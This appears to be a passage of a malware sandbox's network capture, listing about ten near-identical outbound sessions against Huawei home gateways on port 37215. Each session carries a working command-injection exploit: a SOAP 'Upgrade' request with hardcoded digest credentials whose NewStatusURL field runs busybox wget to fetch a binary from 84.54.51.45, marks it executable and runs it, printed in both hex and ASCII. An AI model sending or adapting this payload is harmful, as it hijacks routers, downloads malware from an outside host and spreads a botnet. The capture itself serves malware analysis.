                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2475192.168.2.154941641.125.37.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816601038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2476192.168.2.155696641.124.143.19437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816637039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2477192.168.2.153417241.199.120.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816662073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2478192.168.2.155704441.70.133.19337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816692114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2479192.168.2.153958041.51.148.13437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816715956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2480192.168.2.153592441.152.14.16837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816740990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2481192.168.2.155905841.83.1.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816787958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2482192.168.2.154908441.186.12.14437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816807985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2483192.168.2.154635841.174.0.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816863060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2484192.168.2.155567041.192.59.14037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816920042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
